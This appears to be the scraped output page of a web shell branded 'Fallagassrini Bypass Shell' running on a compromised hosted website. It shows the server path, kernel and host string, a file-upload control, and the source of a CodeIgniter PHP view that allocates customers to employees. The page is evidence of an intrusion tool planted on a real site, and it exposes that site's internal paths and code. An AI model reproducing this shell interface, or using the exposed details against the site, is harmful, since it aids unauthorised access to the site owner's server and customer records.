? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/www/savoyglobal.net/sgms/application/views/Sales/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/www/savoyglobal.net/sgms/application/views/Sales/single_employeecustomer.php

<?php  
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
?>

<div class="select-bar">
    <label><img src="<?=base_url()?>assets/images/backbutton.png" title="Back" class="clickimage" onclick="viewdata('sales','viewinsalessearch','search_employeecustomer','view_employeecustomer','<?=$_SESSION['pagenum'];?>')" alt="Back" align = "center" width="25" height="25"  />
    </label>
    <span class="heading">Allocate customer to employee</span>
</div>

<fieldset>
    <?php
        $attributes=array('id'=>'validateform','class'=>'customForm');
        echo form_open('',$attributes);
    ?>
    <ul>
        <li>
            <label for="data">Customer Name</label>
            <div class="record_entry"><?=$this->mastermodel->getSingleFieldValue('customer','customer_name','customer_id',$viewinfo->customer_id);?></div>
          
        </li>
        <li>
            <label for="data">Employee Name</label>
            <div class="record_entry"><?=$this->mastermodel->getSingleFieldValue('employee','employee_name','employee_id',$viewinfo->employee_id);?></div>
        </li>
        <li>
            <label for="data">Alloted Date</label>
            <div class="record_entry">
                 <?php
                      echo $this->mastermodel->convertdatenormalformat($viewinfo->customer_allocation_date);
                 ?>
            </div>
        </li>
        <li>
           <label for="data">Description</label>
           <div class="record_entry">
                 <?php
                      echo $viewinfo->description;
                 ?>
            </div>
        </li>
        
        
    </ul>
<?php echo form_close();?>
</fieldset>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net